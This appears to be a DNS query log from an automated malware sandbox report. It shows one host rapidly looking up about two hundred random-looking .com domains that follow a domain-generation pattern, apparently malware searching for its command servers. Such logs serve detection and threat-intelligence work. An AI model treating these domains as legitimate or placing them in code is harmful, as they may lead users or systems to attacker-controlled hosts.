                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.217603922 CET192.168.2.61.1.1.10x3192Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.217987061 CET192.168.2.61.1.1.10x3a4aStandard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218008041 CET192.168.2.61.1.1.10x23d2Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218405962 CET192.168.2.61.1.1.10x74a5Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218535900 CET192.168.2.61.1.1.10x6dbeStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218643904 CET192.168.2.61.1.1.10x691eStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218643904 CET192.168.2.61.1.1.10x67c4Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218755007 CET192.168.2.61.1.1.10xa5caStandard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218827963 CET192.168.2.61.1.1.10x711eStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219049931 CET192.168.2.61.1.1.10x80bbStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219049931 CET192.168.2.61.1.1.10xe880Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219275951 CET192.168.2.61.1.1.10x3409Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222399950 CET192.168.2.61.1.1.10xd17dStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222682953 CET192.168.2.61.1.1.10xb07bStandard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222847939 CET192.168.2.61.1.1.10x2d19Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223020077 CET192.168.2.61.1.1.10xa433Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223159075 CET192.168.2.61.1.1.10xe2ebStandard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223453045 CET192.168.2.61.1.1.10x31c6Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223608017 CET192.168.2.61.1.1.10x904cStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223661900 CET192.168.2.61.1.1.10x959fStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223831892 CET192.168.2.61.1.1.10xdf9eStandard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223831892 CET192.168.2.61.1.1.10x3552Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.224250078 CET192.168.2.61.1.1.10x6905Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.224824905 CET192.168.2.61.1.1.10x4a29Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.291924000 CET192.168.2.61.1.1.10xd277Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.292927980 CET192.168.2.61.1.1.10x44fcStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.402395010 CET192.168.2.61.1.1.10xb3e5Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.841571093 CET192.168.2.61.1.1.10x91a7Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.844367027 CET192.168.2.61.1.1.10xdcfStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.846759081 CET192.168.2.61.1.1.10x6b18Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.848562956 CET192.168.2.61.1.1.10x8befStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.853858948 CET192.168.2.61.1.1.10x5176Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.854793072 CET192.168.2.61.1.1.10x36f2Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET192.168.2.61.1.1.10x58c7Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET192.168.2.61.1.1.10xea2fStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855799913 CET192.168.2.61.1.1.10xb26cStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856405973 CET192.168.2.61.1.1.10x84efStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856795073 CET192.168.2.61.1.1.10xbd16Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856971025 CET192.168.2.61.1.1.10x39c9Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET192.168.2.61.1.1.10xe71dStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET192.168.2.61.1.1.10x47fbStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859110117 CET192.168.2.61.1.1.10x7287Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859719038 CET192.168.2.61.1.1.10x47c0Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860060930 CET192.168.2.61.1.1.10xbf77Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860277891 CET192.168.2.61.1.1.10xa46fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860716105 CET192.168.2.61.1.1.10x51c7Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860940933 CET192.168.2.61.1.1.10x1cf7Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET192.168.2.61.1.1.10x7201Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET192.168.2.61.1.1.10x74d1Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862668037 CET192.168.2.61.1.1.10x5e8dStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.863270044 CET192.168.2.61.1.1.10xdaeaStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.865431070 CET192.168.2.61.1.1.10x1a46Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.866702080 CET192.168.2.61.1.1.10xbea1Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.867305994 CET192.168.2.61.1.1.10x7ebfStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868217945 CET192.168.2.61.1.1.10xab76Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868768930 CET192.168.2.61.1.1.10x288aStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET192.168.2.61.1.1.10x328bStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET192.168.2.61.1.1.10x7c01Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.873013020 CET192.168.2.61.1.1.10x6975Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.874579906 CET192.168.2.61.1.1.10x197Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.876377106 CET192.168.2.61.1.1.10x925eStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET192.168.2.61.1.1.10xf75eStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET192.168.2.61.1.1.10x7860Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.881223917 CET192.168.2.61.1.1.10xf737Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.882647038 CET192.168.2.61.1.1.10x6ca5Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.884524107 CET192.168.2.61.1.1.10x28aStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.886239052 CET192.168.2.61.1.1.10xe484Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.888320923 CET192.168.2.61.1.1.10x6202Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890258074 CET192.168.2.61.1.1.10xd614Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890980959 CET192.168.2.61.1.1.10xc17fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET192.168.2.61.1.1.10x8f7aStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET192.168.2.61.1.1.10x6470Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.894844055 CET192.168.2.61.1.1.10x4eb2Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895268917 CET192.168.2.61.1.1.10x47edStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895834923 CET192.168.2.61.1.1.10xcd96Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.896425009 CET192.168.2.61.1.1.10x5e6bStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET192.168.2.61.1.1.10x2c29Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET192.168.2.61.1.1.10xf229Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.899246931 CET192.168.2.61.1.1.10x5fe1Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901226997 CET192.168.2.61.1.1.10xb9faStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901583910 CET192.168.2.61.1.1.10x7a4aStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET192.168.2.61.1.1.10x5c0cStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET192.168.2.61.1.1.10x6c4aStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.904652119 CET192.168.2.61.1.1.10x75cdStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905456066 CET192.168.2.61.1.1.10x1836Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905951023 CET192.168.2.61.1.1.10xc196Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET192.168.2.61.1.1.10x174aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET192.168.2.61.1.1.10xa0c4Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908123016 CET192.168.2.61.1.1.10xa354Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908818007 CET192.168.2.61.1.1.10x8fb6Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908976078 CET192.168.2.61.1.1.10xf3cfStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.539639950 CET192.168.2.61.1.1.10x884bStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.546529055 CET192.168.2.61.1.1.10x9c1fStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.553680897 CET192.168.2.61.1.1.10xe3feStandard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554414988 CET192.168.2.61.1.1.10xdf2dStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554748058 CET192.168.2.61.1.1.10xc9a2Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.558689117 CET192.168.2.61.1.1.10x6f63Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.561511993 CET192.168.2.61.1.1.10x32b6Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564273119 CET192.168.2.61.1.1.10x4651Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564970970 CET192.168.2.61.1.1.10x6d5fStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.565929890 CET192.168.2.61.1.1.10x6d92Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568120956 CET192.168.2.61.1.1.10xb6f4Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568183899 CET192.168.2.61.1.1.10x9663Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568700075 CET192.168.2.61.1.1.10xf14dStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569200039 CET192.168.2.61.1.1.10x378eStandard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569232941 CET192.168.2.61.1.1.10x6992Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569973946 CET192.168.2.61.1.1.10x4465Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.574381113 CET192.168.2.61.1.1.10xea40Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.580322981 CET192.168.2.61.1.1.10xae38Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.584772110 CET192.168.2.61.1.1.10x274dStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.585496902 CET192.168.2.61.1.1.10xe888Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.591262102 CET192.168.2.61.1.1.10xd71dStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601490974 CET192.168.2.61.1.1.10xf4ddStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601685047 CET192.168.2.61.1.1.10xa73fStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601984024 CET192.168.2.61.1.1.10xef88Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602124929 CET192.168.2.61.1.1.10x4b6aStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602283955 CET192.168.2.61.1.1.10x5f41Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602457047 CET192.168.2.61.1.1.10x1e8fStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602457047 CET192.168.2.61.1.1.10x1693Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602606058 CET192.168.2.61.1.1.10xf305Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602627993 CET192.168.2.61.1.1.10xaf71Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602798939 CET192.168.2.61.1.1.10x4411Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602838993 CET192.168.2.61.1.1.10x8eb0Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602978945 CET192.168.2.61.1.1.10xcfccStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.603074074 CET192.168.2.61.1.1.10x6032Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.603189945 CET192.168.2.61.1.1.10x18d4Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.603351116 CET192.168.2.61.1.1.10x920bStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.609438896 CET192.168.2.61.1.1.10x42abStandard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.609738111 CET192.168.2.61.1.1.10xd6d5Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.624989986 CET192.168.2.61.1.1.10xbbb6Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.627609968 CET192.168.2.61.1.1.10x8268Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.628175020 CET192.168.2.61.1.1.10x26d5Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.639575958 CET192.168.2.61.1.1.10x1562Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.641382933 CET192.168.2.61.1.1.10x31c6Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.641556978 CET192.168.2.61.1.1.10xc014Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.641670942 CET192.168.2.61.1.1.10xbcaeStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.641894102 CET192.168.2.61.1.1.10x1bcbStandard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.641967058 CET192.168.2.61.1.1.10x5fa5Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.642251968 CET192.168.2.61.1.1.10xe43bStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.642546892 CET192.168.2.61.1.1.10x3045Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.642688990 CET192.168.2.61.1.1.10x9d4bStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.642883062 CET192.168.2.61.1.1.10x1b61Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.644217014 CET192.168.2.61.1.1.10xcf9dStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.644450903 CET192.168.2.61.1.1.10x866aStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.644920111 CET192.168.2.61.1.1.10x8e05Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.646418095 CET192.168.2.61.1.1.10x89eStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.646716118 CET192.168.2.61.1.1.10x1ba3Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.646812916 CET192.168.2.61.1.1.10x3282Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.647017956 CET192.168.2.61.1.1.10x3ecdStandard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.651587009 CET192.168.2.61.1.1.10x3132Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.652034998 CET192.168.2.61.1.1.10x7fb2Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.652714014 CET192.168.2.61.1.1.10x48feStandard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.652836084 CET192.168.2.61.1.1.10x3a7Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.653321981 CET192.168.2.61.1.1.10xa585Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.683330059 CET192.168.2.61.1.1.10xa374Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.519751072 CET192.168.2.61.1.1.10x21e5Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.521709919 CET192.168.2.61.1.1.10x363dStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.522485018 CET192.168.2.61.1.1.10xe0ceStandard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.522800922 CET192.168.2.61.1.1.10x209bStandard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.523843050 CET192.168.2.61.1.1.10xcadStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.526352882 CET192.168.2.61.1.1.10x74b3Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.527689934 CET192.168.2.61.1.1.10x1c26Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.528357983 CET192.168.2.61.1.1.10xdd39Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.529227972 CET192.168.2.61.1.1.10x7586Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.530976057 CET192.168.2.61.1.1.10x87a6Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.531650066 CET192.168.2.61.1.1.10xa195Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.533298016 CET192.168.2.61.1.1.10x7044Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.534440994 CET192.168.2.61.1.1.10x2a50Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.535126925 CET192.168.2.61.1.1.10x9121Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.576389074 CET192.168.2.61.1.1.10x27e0Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.598606110 CET192.168.2.61.1.1.10x8924Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599090099 CET192.168.2.61.1.1.10xb6adStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599332094 CET192.168.2.61.1.1.10x2855Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599347115 CET192.168.2.61.1.1.10xeaa7Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599488974 CET192.168.2.61.1.1.10xf747Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599654913 CET192.168.2.61.1.1.10xe2c1Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.599781036 CET192.168.2.61.1.1.10x96b3Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.600018978 CET192.168.2.61.1.1.10xddefStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.600048065 CET192.168.2.61.1.1.10x3169Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.600347042 CET192.168.2.61.1.1.10x2a06Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.600392103 CET192.168.2.61.1.1.10xe894Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
